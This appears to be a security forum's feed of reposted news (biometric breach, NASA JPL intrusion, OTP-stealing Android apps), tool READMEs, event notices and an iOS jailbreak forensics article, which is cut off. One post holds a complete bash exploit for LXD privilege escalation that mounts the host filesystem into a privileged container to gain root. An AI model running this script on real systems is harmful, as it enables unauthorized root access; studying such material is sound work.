  4. More than a million people have their biometric data exposed in massive security breach Graham Cluley Aug 15, 2019 IT Security and Data Protection A biometrics system used to secure more than 1.5 million locations around the world – including banks, police forces, and defence companies in the United States, UK, India, Japan, and the UAE – has suffered a major data breach, exposing a huge number of records. South Korean firm Suprema runs the web-based biometric access platform BioStar 2, but left the fingerprints and facial recognition data of more than one million people exposed on a publicly accessible database. Privacy researchers Noam Rotem and Ran Locar discovered a total of 27.8 million records totalling 23 gigabytes of data, including usernames and passwords stored in plaintext. Rotem told The Guardian that having discovered the plaintext passwords of BioStar 2 administrator accounts he and Locar were granted a worrying amount of power: “We were able to find plain-text passwords of administrator accounts. The access allows first of all seeing millions of users are using this system to access different locations and see in real time which user enters which facility or which room in each facility, even. We [were] able to change data and add new users.” The researchers claimed they were able to access data from co-working locations in Indonesia and the United States, a UK-based medicine supplier, a gymnasium chain in India and Sri Lanka, and a Finnish car park space developer, amongst others. Perhaps most worryingly of all, however, was that it was possible to access more than one million users’ unencrypted fingerprints and facial biometric records (rather than hashed versions that cannot be reverse-engineered.) The reason why a data breach involving biometric data is worse than one containing just passwords is that you can change your password or PIN code. Your fingerprints? Your face? You’re stuck with them for life. Good luck changing them every time your biometric data gets breached. Tim Erlin, VP of product management and strategy at Tripwire, commented: “As an industry, we’ve learned a lot of lessons about how to securely store authentication data over the years. In many cases, we’re still learning and re-learning those lessons. Unfortunately, companies can’t send out a reset email for fingerprints. The benefit and disadvantage of biometric data is that it can’t be changed.” “Using multiple factors for authentication helps mitigate these kinds of breaches. As long as I can’t get access to a system or building with only one factor, then the compromise of my password, key card or fingerprint doesn’t result in compromise of the whole system. Of course, if these factors are stored or alterable from a single system, then there remains a single point of failure.” Erlin is right to raise concerns that lessons don’t seem to being learnt. Back in 2015, for instance, I described how hackers had breached the systems of the Office of Personnel Management (OPM) in a high profile hack that saw approximately 5.6 million fingerprints stolen, alongside social security numbers, addresses and other personal information. All organisations need to take great care over the biometric information they may be storing about their customers and employees, and ensure that the chances of sensitive data falling into the hands of hackers are minimised or – better yet – eradicated. Suprema’s BioStar 2 database has now been properly secured, and is no longer publicly accessible. However, Suprema sounds a little less than keen to inform customers about the security breach. The company’s head of marketing Andy Ahn says that Suprema will undertake an “in-depth evaluation” of the researchers’ findings before making a decision. “If there has been any definite threat on our products and/or services, we will take immediate actions and make appropriate announcements to protect our customers’ valuable businesses and assets,” Ahn is quoted as saying in The Guardian article. Fortunately, at the moment there is no indication that criminals were able to access the highly sensitive data. However, it’s understandable that there should still be concerns that if they had managed to steal the exposed data it could be used for criminal activity and fraud, or even to gain access to supposedly secure commercial buildings. Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor, and do not necessarily reflect those of Tripwire, Inc. Sursa: https://www.tripwire.com/state-of-security/featured/more-million-people-biometric-data-exposed-security-breach/
  5. LDAPDomainDump Active Directory information dumper via LDAP Introduction In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format. ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files. The tool was designed with the following goals in mind: Easy overview of all users/groups/computers/policies in the domain Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1) Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impackets ntlmrelayx The tool outputs several files containing an overview of objects in the domain: domain_groups: List of groups in the domain domain_users: List of users in the domain domain_computers: List of computer accounts in the domain domain_policy: Domain policy such as password requirements and lockout policy domain_trusts: Incoming and outgoing domain trusts, and their properties As well as two grouped files: domain_users_by_group: Domain users per group they are member of domain_computers_by_os: Domain computers sorted by Operating System Dependencies and installation Requires ldap3 > 2.0 and dnspython Both can be installed with pip install ldap3 dnspython The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump. Usage There are 3 ways to use the tool: With just the source, run python ldapdomaindump.py After installing, by running python -m ldapdomaindump After installing, by running ldapdomaindump Help can be obtained with the -h switch: usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}] [-o DIRECTORY] [--no-html] [--no-json] [--no-grep] [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER] [-m] HOSTNAME Domain information dumper via LDAP. Dumps users/computers/groups and OS/membership information to HTML/JSON/greppable output. Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to (use ldaps:// to use SSL) Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication, leave empty for anonymous authentication -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified -at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE} Authentication type (NTLM or SIMPLE, default: NTLM) Output options: -o DIRECTORY, --outdir DIRECTORY Directory in which the dump will be saved (default: current) --no-html Disable HTML output --no-json Disable JSON output --no-grep Disable Greppable output --grouped-json Also write json files for grouped files (default: disabled) -d DELIMITER, --delimiter DELIMITER Field delimiter for greppable output (default: tab) Misc options: -r, --resolve Resolve computer hostnames (might take a while and cause high traffic on large networks) -n DNS_SERVER, --dns-server DNS_SERVER Use custom DNS resolver instead of system DNS (try a domain controller IP) -m, --minimal Only query minimal set of attributes to limit memmory usage Options Authentication Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE. Output formats By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already. DNS resolving An important option is the -r option, which decides if a computers DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD Domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller. Minimizing network and memory usage By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch. Visualizing groups with BloodHound LDAPDomainDump includes a utility that can be used to convert ldapdomaindumps .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json file and convert those to group_membership.csv and trust.csv which you can add to BloodHound. License MIT Sursa: https://github.com/dirkjanm/ldapdomaindump
      • 3
      • Thanks
      • Upvote
  6. hollows_hunter Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches). Uses PE-sieve (DLL version): https://github.com/hasherezade/pe-sieve.git Clone: Use recursive clone to get the repo together with all the submodules: git clone --recursive https://github.com/hasherezade/hollows_hunter.git Sursa: https://github.com/hasherezade/hollows_hunter
      • 1
      • Upvote
  7. PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches. Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc. Uses library: https://github.com/hasherezade/libpeconv.git FAQ - Frequently Asked Questions Clone: Use recursive clone to get the repo together with the submodule: git clone --recursive https://github.com/hasherezade/pe-sieve.git Latest builds*: *those builds are available for testing and they may be ahead of the official release: 32-bit 64-bit Read more: Wiki: https://github.com/hasherezade/pe-sieve/wiki logo by Baran Pirinçal Sursa: https://github.com/hasherezade/pe-sieve
      • 1
      • Upvote
  8. Dr.Semu Dr.Semu runs executables in an isolated environment, monitors the behavior of a process, and based on Dr.Semu rules created by you or community, detects if the process is malicious or not. [The tool is in the early development stage] whoami: @_qaz_qaz Dr.Semu let you to create rules for different malware families and detect new samples based on their behavior. Isolation through redirection Everything happens from the user-mode. Windows Projected File System (ProjFS) is used to provide a virtual file system. For Registry redirection, it clones all Registry hives to a new location and redirects all Registry accesses (after caching Registry hives, all subsequent executions are very fast, ~0.3 sec.) See the source code for more about other redirections (process/objects isolation, etc). Monitoring Dr.Semu uses DynamoRIO (Dynamic Instrumentation Tool Platform) to intercept a thread when it's about to cross the user-kernel line. It has the same effect as hooking SSDT but from the user-mode and without hooking anything. At this phase, Dr.Semu produces a JSON file, which contains information from the interception. Detection After terminating the process, based on Dr.Semu rules we receive if the executable is detected as malware or not. Dr.Semu rules They are written in LUA and use dynamic information from the interception and static information about the sample. It's trivial to add support of other languages. Example: https://gist.github.com/secrary/e16daf698d466136229dc417d7dbcfa3 Usage Use PowerShell to enable ProjFS in an elevated PowerShell window: Enable-WindowsOptionalFeature -Online -FeatureName Client-ProjFS -NoRestart Download and extract a zip file from the releases page Download DynamoRIO and extract into DrSemu folder and rename to dynamorio DrSemu.exe --target file_path DrSemu.exe --target files_directory DEMO BUILD Use PowerShell to enable ProjFS in an elevated PowerShell window: Enable-WindowsOptionalFeature -Online -FeatureName Client-ProjFS -NoRestart Download DynamoRIO and extract into bin folder and rename to dynamorio Build pe-parser-library.lib library: Generate VS project from DrSemu\shared_libs\pe_parse using cmake-gui Build 32-bit library under build (\shared_libs\pe_parse\build\pe-parser-library\Release\) and 64-bit one under build64 Change run-time library option to Multi-threaded (/MT) Set LauncherCLI As StartUp Project TODO Solve isolation related issues Update the description, add more details Create a GUI for the tool Limitations Minimum supported Windows version: Windows 10, version 1809 (due to Windows Projected File System) Maximum supported Windows version: Windows 10, version 1809 (DynamoRIO supports Windows 10 versions until 1809) Sursa: https://github.com/secrary/DrSemu
      • 1
      • Upvote
  9. website-checks website-checks checks websites with multiple services. These are currently: crt.sh CryptCheck HSTS Preload List HTTP Observatory Lighthouse PageSpeed Insights Security Headers SSL Decoder SSLLabs webbkoll webhint Installation npm i -g danielruf/website-checks yarn global add danielruf/website-checks Usage website-checks example.com Change output directory website-checks example.com --output pdf would save all PDF files to the local pdf directory. CLI flags By default all checks (except --ssldecoder) will run. If you want to run only specific checks you can add CLI flags. Currently the following CLI flags will run the matching checks: --crtsh --cryptcheck --hstspreload --httpobservatory --lighthouse --psi --securityheaders --ssldecoder --ssldecoder-fast --ssllabs --webbkoll --webhint For example website-checks example.com --lighthouse --securityheaders will run the Lighthouse and Security Headers checks. Known issues missing Chrome / Chromium dependency for Windows binary (.exe) On Windows it may happen that the bundled binary throws the following error: UnhandledPromiseRejectionWarning: Error: Chromium revision is not downloaded. Run "npm install" or "yarn install" at Launcher.launch This is a known issue with all solutions like pkg and nexe and expected as Chromium is not bundled with the binary which would make it much bigger. In most cases it should be solved by globally installing puppeteer or by having Chrome or Chromium installed and in PATH. Sursa: https://github.com/DanielRuf/website-checks
      • 2
      • Like
      • Upvote
  10. Nytro

    Fun stuff

    https://9gag.com/gag/a6NwnMe
  11. Am adaugat suport pentru Windows x64, Linux x86 si Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  12. Nu permitem lucruri ilegale pe forum, gen sa se obtina acces la anumite site-uri sau pagini/profiluri de Facebook. In plus, hackforums e o mizerie.
  13. Maday.conf ( https://www.mayday-conf.com ) este prima conferinta internationala de cyber security din Cluj Napoca (24-25 octombrie) iar RST este community partener al evenimentului. Acest eveniment s-a nascut din pasiunea pentru security si isi doreste in primul rand sa ajute la dezvoltarea oamenilor care sunt interesati de acest domeniu. In timpul evenimentului o sa aiba loc prezentari referitoare la ultimele tehnici folosite de pentesteri, de Incident Responders dar si lucruri precum identificarea TTPs folosite de catre atacatori. Mai mult, in cadrul evenimentului o sa avem CTF-uri cu premii, exercitii cyber dar si workshop-uri. Pentru a primi notificari in timp real va puteti abona la newsletter pe www.mayday-conf.com, follow la pagina de Facebook ( https://www.facebook.com/MayDayCon ) / Twitter ( https://twitter.com/ConfMayday) sau intra pe grupul de Slack ( https://maydayconf.slack.com/join/shared_invite/enQtNTc5Mzk0NTk0NTk3LWVjMTFhZWM2MTVlYmQzZjdkMDQ5ODI1NWM3ZDVjZGJkYjNmOGUyMjAxZmQyMDlkYzg5YTQxNzRmMmY3NGQ1MGM) Acum urmeaza surpriza... Pentru ca "sharing is caring" organizatorii ofera membrilor RST 10 vouchere de acces pentru ambele zile. Acestea pot fi obtinute printr-un private message catre Nytro (care sa includa o adresa de email) pana la data de 1 septembrie iar selectia se va face in functie de urmatoarele criterii: - numarul de postari pe forum - numarul de like-uri si upvote-uri primite pe postari - proiecte publicate in forum - vechimea pe RST URL: https://www.mayday-conf.com
  14. Eu stiam de asta: https://github.com/IBM/adversarial-robustness-toolbox
  15. Nowadays, IT Security industry faces new challenges, bad actors can use multiple techniques to extract sensitive data from a target, a RedTeam simulates such attack. HackTheZone has developed a RedTeam challenge for IT Security enthusiasts that lets the attendees overcome their limits and use technics like WarDriving, Social Engineering, Penetration testing and more, all those skills will be used in a real playground, Bucharest. Enrollment in the HackTheZone RedTeam challenge will be available soon on the HackTheZone conference website: https://www.hackthezone.com The conference will be held at Crystal Palace Ballrooms, Calea Rahovei 198A, Sector 5, Bucharest, among the award-winning ceremony for the HackTheZone RedTeam challenge, we will treat latest IT Security trends with the aid of our highly certified speakers. For more details about our challenges you can join our community via Slack - https://www.hackthezone.com/slack
  16. Writing shellcodes for Windows x64 On 30 June 2019 By nytrosecurity Long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. First part explains what is a shellcode and which are its limitations, second part explains PEB (Process Environment Block), PE (Portable Executable) file format and the basics of ASM (Assembler) and the third part shows how a Windows shellcode can be actually implemented. This blog post is the port of the previous articles on Windows 64 bits (x64) and it will not cover all the details explained in the previous blog posts, so who is not familiar with all the concepts of shellcode development on Windows must see them before going further. Of course, the differences between x86 and x64 shellcode development on Windows, including ASM, will be covered here. However, since I already write some details about Windows 64 bits on the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here. As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using SwapMouseButton function exported by user32.dll and grecefully close the proccess using ExitProcess function exported by kernel32.dll. Articol complet: https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/
  17. Info stealing Android apps can grab one time passwords to evade 2FA protections Google restricted SMS controls. Hackers found a way around it. By Charlie Osborne for Zero Day | June 18, 2019 -- 09:46 GMT (10:46 BST) | Topic: Security Malicious Android apps have been uncovered which are able to access one-time passwords (OTPs) in order to bypass two-factor authentication (2FA) security mechanisms. Researchers from ESET said on Thursday that the apps impersonated a cryptocurrency exchange based in Turkey, known as BtcTurk, and were available for download in Google Play. Security Can Russian hackers be stopped? Here's why it might take 20 years Cyberwar predictions for 2019: The stakes have been raised A spotter's guide to the groups that are out to get you Cyberwar and the future of cybersecurity (free PDF download) Mobile applications seeking to bypass 2FA in order to hijack a victim's device used to often ask for the permissions required to seize control of SMS settings, which would allow the malicious software to intercept 2FA codes designed to add a secondary layer of security to online accounts. Earlier this year, Google restricted SMS and Call Log permissions in Android to stop developers from gaining access to these sensitive permissions without personally making their case in front of the tech giant first. The crackdown caused chaos for some legitimate developers whose apps were suddenly at risk of losing useful features. When it came to malicious apps, however, the change in Google's policies stripped many of the options available to abuse SMS and Call Log controls to bypass 2FA. See also: Cyber security 101: Protect your privacy from hackers, spies, and the government In the apps found by ESET, the developer has come up with a way to circumvent Google's changes. The first app was uploaded to Google Play on June 7, 2019, under the developer and application name "BTCTurk Pro Beta." The second, named "BtcTurk Pro Beta," falls under the developer name "BtSoft." After one of these applications has been downloaded and launched, the software requests a permission called Notification access which gives the app the power to read notifications displayed by other apps on the device, to dismiss them, or to click any buttons they contain. The app then shows a fake login request to access the Turkish cryptocurrency platform. If credentials are submitted, an error page is played while the account credentials are whisked away to the attacker's command-and-control (C2) server. "Instead of intercepting SMS messages to bypass 2FA protection on users' accounts and transactions, these malicious apps take the OTP from notifications appearing on the compromised device's display," ESET says. "Besides reading the 2FA notifications, the apps can also dismiss them to prevent victims from noticing fraudulent transactions happening." TechRepublic: How fraudulent domain names are powering phishing attacks The malicious apps also have filters in place while scanning notifications on the lock screen and so only alerts of interest are targeted. Keywords include "mail," "outlook," "sms," and "messaging." The technique is new and effective but only to the point of how much information can be stolen from a notification box. The OTP may not be fully shown in a mobile notification pop-up, and while the interception method could also theoretically be used to grab email-based one-time passwords, message lengths vary and so the attack vector may not always be successful. CNET: Security firm Cellebrite says it can unlock any iPhone Thankfully, fewer than 100 users are believed to have installed the apps before they were reported to Google on June 12 and removed. However, as the Notification access permission was introduced in Android 4.3, the security team has suggested that the 2FA bypass technique could affect "almost all active Android devices." Sursa: https://www.zdnet.com/article/info-stealing-android-apps-can-now-access-passwords-to-avoid-2fa-protections/
  18. NASA hacked because of unauthorized Raspberry Pi connected to its network NASA described the hackers as an "advanced persistent threat," a term generally used for nation-state hacking groups. By Catalin Cimpanu for Zero Day | June 21, 2019 -- 20:46 GMT (21:46 BST) | Topic: Security This low-angle self-portrait of NASA's Curiosity Mars rover shows the vehicle at the site from which it reached down to drill into a rock target called "Buckskin." The MAHLI camera on Curiosity's robotic arm took multiple images on Aug. 5, 2015, that were stitched together into this selfie. NASA/JPL-Caltech/MSSS See also Best VR headsets for 2019 (CNET) A report published this week by the NASA Office of Inspector General reveals that in April 2018 hackers breached the agency's network and stole approximately 500 MB of data related to Mars missions. The point of entry was a Raspberry Pi device that was connected to the IT network of the NASA Jet Propulsion Laboratory (JPL) without authorization or going through the proper security review. Hackers stole Mars missions data According to a 49-page OIG report, the hackers used this point of entry to move deeper inside the JPL network by hacking a shared network gateway. The hackers used this network gateway to pivot inside JPL's infrastructure, and gained access to the network that was storing information about NASA JPL-managed Mars missions, from where he exfiltrated information. The OIG report said the hackers used "a compromised external user system" to access the JPL missions network. "The attacker exfiltrated approximately 500 megabytes of data from 23 files, 2 of which contained International Traffic in Arms Regulations information related to the Mars Science Laboratory mission," the NASA OIG said. The Mars Science Laboratory is the JPL program that manages the Curiosity rover on Mars, among other projects. Hackers also breached NASA's satellite dish network NASA's JPL division primary role is to build and operate planetary robotic spacecraft such as the Curiosity rover, or the various satellites that orbit planets in the solar system. In addition, the JPL also manages NASA's Deep Space Network (DSN), a worldwide network of satellite dishes that are used to send and receive information from NASA spacecrafts in active missions. Investigators said that besides accessing the JPL's mission network, the April 2018 intruder also accessed the JPL's DSN IT network. Upon the dicovery of the intrusion, several other NASA facilities disconnected from the JPL and DSN networks, fearing the attacker might pivot to their systems as well. Hackers described as an APT "Classified as an advanced persistent threat, the attack went undetected for nearly a year," the NASA OIG said. "The investigation into this incident is ongoing." The report blamed the JPL's failure to segment its internal network into smaller segments, a basic security practice that makes it harder for hackers to move inside compromised networks with relative ease. The NASA OIG also blamed the JPL for failing to keep the Information Technology Security Database (ITSDB) up to date. The ITSDB is a database for the JPL IT staff, where system administrators are supposed to log every device connected to the JPL network. The OIG found that the database inventory was incomplete and inaccurate. For example, the compromised Raspberry Pi board that served as a point of entry had not been entered in the ITSDB inventory. In addition, investigators also found that the JPL IT staff was lagging behind when it came to fixing any security-related issues. "We also found that security problem log tickets, created in the ITSDB when a potential or actual IT system security vulnerability is identified, were not resolved for extended periods of time-sometimes longer than 180 days," the report said. Was APT10 behind the hack? In December 2018, the US Department of Justice charged two Chinese nationals for hacking cloud providers, NASA, and the US Navy. The DOJ said the two hackers were part of one of the Chinese government's elite hacking units known as APT10. The two were charged for hacking the NASA Goddard Space Center and the Jet Propulsion Laboratory. It is unclear if these are the "advanced persistent threat" which hacked the JPL in April 2018 because the DOJ indictment did not provide a date for APT10's JPL intrusion. Also in December 2018, NASA announced another breach. This was a separate incident from the April 2018 hack. This second breach was discovered in October 2018, and the intruder(s) stole only NASA employee-related information. Sursa: https://www.zdnet.com/article/nasa-hacked-because-of-unauthorized-raspberry-pi-connected-to-its-network/
  19. Flaguri pot fi peste tot: RST{RSTCON_STEAGUL_DE_PE_FORUM}
  20. Wild West Hackin' Fest 2017 Presented by Deviant Ollam: https://enterthecore.net/ Many organizations are accustomed to being scared at the results of their network scans and digital penetration tests, but seldom do these tests yield outright "surprise" across an entire enterprise. Some servers are unpatched, some software is vulnerable, and networks are often not properly segmented. No huge shocks there. As head of a Physical Penetration team, however, my deliverable day tends to be quite different. With faces agog, executives routinely watch me describe (or show video) of their doors and cabinets popping open in seconds. This presentation will highlight some of the most exciting and shocking methods by which my team and I routinely let ourselves in on physical jobs. ________________________________________________________________ While paying the bills as a security auditor and penetration testing consultant with The CORE Group, Deviant Ollam is also a member of the Board of Directors of the US division of TOOOL, The Open Organisation Of Lockpickers. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a GSA certified safe and vault technician and inspector. At multiple annual security conferences Deviant runs the Lockpick Village workshop area, and he has conducted physical security training sessions for Black Hat, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point. His favorite Amendments to the US Constitution are, in no particular order, the 1st, 2nd, 9th, & 10th. Deviant's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's Science, Technology, & Society program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. While earning his BS degree at NJIT, Deviant also completed the History degree program at Rutgers University.
      • 1
      • Upvote
  21. #!/usr/bin/env bash # ---------------------------------- # Authors: Marcelo Vazquez (S4vitar) # Victor Lasa (vowkin) # ---------------------------------- # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine] # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine] # Step 3: Run this script and you will get root [Victim Machine] # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine function helpPanel(){ echo -e "\nUsage:" echo -e "\t[-f] Filename (.tar.gz alpine file)" echo -e "\t[-h] Show this help panel\n" exit 1 } function createContainer(){ lxc image import $filename --alias alpine && lxd init --auto echo -e "[*] Listing images...\n" && lxc image list lxc init alpine privesc -c security.privileged=true lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true lxc start privesc lxc exec privesc sh cleanup } function cleanup(){ echo -en "\n[*] Removing container..." lxc stop privesc && lxc delete privesc && lxc image delete alpine echo " [√]" } set -o nounset set -o errexit declare -i parameter_enable=0; while getopts ":f:h:" arg; do case $arg in f) filename=$OPTARG && let parameter_enable+=1;; h) helpPanel;; esac done if [ $parameter_enable -ne 1 ]; then helpPanel else createContainer fi Sursa: https://www.exploit-db.com/exploits/46978?utm_source=dlvr.it&utm_medium=twitter
  22. Forensic Implications of iOS Jailbreaking June 12th, 2019 by Oleg Afonin Jailbreaking is used by the forensic community to access the file system of iOS devices, perform physical extraction and decrypt device secrets. Jailbreaking the device is one of the most straightforward ways to gain low-level access to many types of evidence not available with any other extraction methods. On the negative side, jailbreaking is a process that carries risks and other implications. Depending on various factors such as the jailbreak tool, installation method and the ability to understand and follow the procedure will affect the risks and consequences of installing a jailbreak. In this article we’ll talk about the risks and consequences of using various jailbreak tools and installation methods. Why jailbreak? Why jailbreak, and should you jailbreak at all? Speaking of mobile forensics, jailbreaking the device helps extract some additional bits and pieces of information compared to other acquisition methods. Before discussing the differences between the different acquisition methods, let’s quickly look at what extraction methods are available for iOS devices. Logical acquisition Logical acquisition is the simplest, cleanest and the most straightforward acquisition method by a long stretch. During logical acquisition, experts can make the iPhone (iPad, iPad Touch) backup its contents. In addition to the backup (and regardless of whether or not the user protected backups with a password), logical acquisition enables experts to extract media files (pictures and videos), crash logs and shared files. Logical acquisition, when performed properly, yields a comprehensive set of data including (for password-protected backups) the content of the user’s keychain. Requirements: the iOS device must be working and not in USB Restricted mode; you must be able to connect it to the computer and perform the pairing procedure (during this step, iOS 11 and 12 will require the passcode). Alternatively, one can use an existing pairing record extracted from the user’s computer. A backup extracted during the course of logical acquisition may come out encrypted. If this is the case, experts may be able to reset the backup password, an action that carries consequences on its own (more information in Step by Step Guide to iOS Jailbreaking and Physical Acquisition, look up the “If you have to reset the backup password” chapter). Jailbreaking the device is a viable alternative to resetting the backup password. After you jailbreak, you’ll be able to extract all of the same information as available in the backup, and more. In addition, you’ll be able to view the user’s backup password in plain text (refer to “Extracting the backup password from the keychain” in the same article). Over-the-air (iCloud) extraction Remote extraction of device data may be possible if you know the user’s Apple ID and password and have access to their second authentication factor (if two-factor authentication is enabled on the user’s Apple account). Some bits and pieces may be accessed without the password by utilizing a binary authentication token. This, however, has very limited use today. Requirements: you must know the user’s Apple ID login and password and have access to the second authentication factor (if 2FA is enabled on the user account). If you require access to protected data categories (iCloud Keychain, iCloud Messages, Health etc.), you must know the passcode or system password to one of the already enrolled devices. To access synchronized data, you may use an existing authentication token instead of the login/password/2FA sequence. During the course of iCloud extraction, you’ll have access to some or all of the following: iCloud backups, synchronized data and media files. If you know the passcode to the user’s device, you may be able to access their iCloud Keychain, Health and Messages data. Apple constantly improves iCloud protection, making it difficult or even impossible to access some types of data in a way other than restoring an actual iOS device. In a game of cat and mouse, manufacturers of forensic software try overcoming such protection measures, while Apple tries to stop third-party tools from accessing iCloud data. Note that some iCloud data (the backups, media files and synchronized data) can be obtained from Apple with a court order. However, even if you have authority to file a request, Apple will not provide any encrypted data such as the user’s passwords (iCloud Keychain), Health and Messages. Physical acquisition Physical is the most in-depth extraction method available. Today, physical acquisition of iOS devices is limited to file system extraction as opposed to imaging and decrypting the entire partition. With this method, experts can image the file system, access sandboxed app data, decrypt the all keychain records including those with this_device_only attribute, extract system logs, and more. Compared to other acquisition methods, physical extraction additionally offers access to all of the following: File system extraction: App databases with uncommitted transactions and WAL files Sandboxed app data for those apps that don’t back up their contents Access to secure chats and protected messages (e.g. Signal, Telegram and many others) Downloaded email messages System logs Keychain: Items protected with this_device_only attribute This includes the password to iTunes backups Physical is the riskiest and the most demanding method as well. The list of requirements includes the device itself in the unlocked state; the ability to pair the device with the computer; and a version of iOS that has known vulnerabilities so that a jailbreak can be installed. The risks of jailbreaking The risks of jailbreaking iOS devices largely depend on the jailbreak tool and installation procedure. However, the main risk of today’s jailbreaks is not about bricking the device. A real risk of making the device unbootable existed in jailbreaks developed for early versions of iOS (up to and including iOS 9). These old jailbreaks were patching the kernel and attempted to bypass the system’s Kernel Patch Protection (KPP) by patching other parts of the operating system. This was never completely reliable; worst case scenario the device would not boot at all. Modern jailbreaks (targeting iOS 10 and newer) are not modifying the kernel and do not need to deal with Kernel Patch Protection. As a result, the jailbroken device will always boot in a non-jailbroken state; you’ll have to reapply the jailbreak on every boot. The two risks of today’s jailbreaks are: Exposing the device to the Internet. By allowing the device going online while installing a jailbreak, you’re effectively allowing the device to sync data, downloading information that was not there at the time the device was seized. Even worse, you’ll make the device susceptible to any remote block or remote erase commands that could be pending.The procedure of installing a jailbreak for the purpose of physical extraction is vastly different from jailbreaking for research or other purposes. In particular, forensic experts are struggling to keep devices offline in order to prevent data leaks, unwanted synchronization and issues with remote device management that may remotely block or erase the device. While there is no lack of jailbreaking guides and manuals for “general” jailbreaking, installing a jailbreak for the purpose of physical acquisition has multiple forensic implications and some important precautions.Mitigation: you can mitigate this risk by following the correct jailbreak installation procedure laid out in our guide on iOS jailbreaking. Jailbreak failing to install. Jailbreaks exploit chains of vulnerabilities in the operating system in order to obtain superuser privileges, escape the sandbox and allow the execution of unsigned applications. Since multiple vulnerabilities are consecutively exploited, the jailbreaking process may fail at any time. Mitigation: since different jailbreaks are using different code and may even target different exploits, the different jailbreak tools have different success rates. Do try another jailbreak tool if your original tool of choice had failed. Consequences of jailbreaking Different jailbreaks bear different consequences. A classic jailbreak such as Meridian, Pangu, TaiG, Chimera or Unc0ver needs to perform a long list of things in order to comply with what is expected of a jailbreak. Since the intended purpose of a jailbreak is allowing to install unsigned apps from third-party repositories, jailbreaks need to disable code signing checks and install a third-party package manager such as Cydia or Sileo. Such things require invasive modifications of the core of the operating system, inevitably remounting and modifying the system partition and writing files to the data partition. The new generation of jailbreaks has recently emerged. Rootless jailbreaks (e.g. RootlessJB) do not, by design, modify the system partition. A rootless jailbreak has a much smaller footprint compared to any classic jailbreak. On the flip side, rootless jailbreaks will not easily allow executing unsigned code or install a third-party package manager. However, they do include a working SSH daemon, making it possible to perform file system extraction. Since rootless jailbreaks do not alter the content of the system partition, one can easily remove such jailbreaks from the device, return the system to pre-jailbroken state and receive OTA updates afterwards. Generally speaking, this task would be very difficult (and sometimes impossible) to achieve when using classic jailbreaks. We have an article in our blog with more information about rootless jailbreaks and their differences from classic jailbreaks: iOS 12 Rootless Jailbreak. Companies such as Cellebrite and GrayShift do not rely on public jailbreaks to perform the extraction. Instead, they use a set of undisclosed exploits to access the file system of iOS devices directly. Using exploits directly has a number of benefits as the device’s file system is usually untouched during the extraction. The only traces left on the device after using an exploit for file system extraction would be entries in various system logs. So let us compare consequences of using a classic or rootless jailbreak to extract the file system. Classic jailbreak Rootless jailbreak Direct exploit File system remount Yes No No Modified system partition Yes No No Modified boot image (kernel) No (since iOS 10) No No Entries in the system log Yes Yes Yes Device can install OTA updates No Yes Yes Access to “/” Yes w/restrictions Yes Access to “/var” Yes Yes Yes Keychain decryption Yes Yes Yes Repeatable results No Yes Yes File system remount Generally speaking, we’d like to avoid the remount of the file system when jailbreaking the device. While remounting the file system opens read/write access to the root of the file system, it also introduces the potential of bricking the device due to incompatible modifications of the system partition that are made possible with r/w access. We can still extract user data and decrypt the keychain without remounting the file system. Modified system partition This, again, is something that we’d like to avoid when performing forensic extractions. Any modification made to the system partition can potentially brick the device or make it less stable. A modified system partition may break OTA updates (a full update or restore through 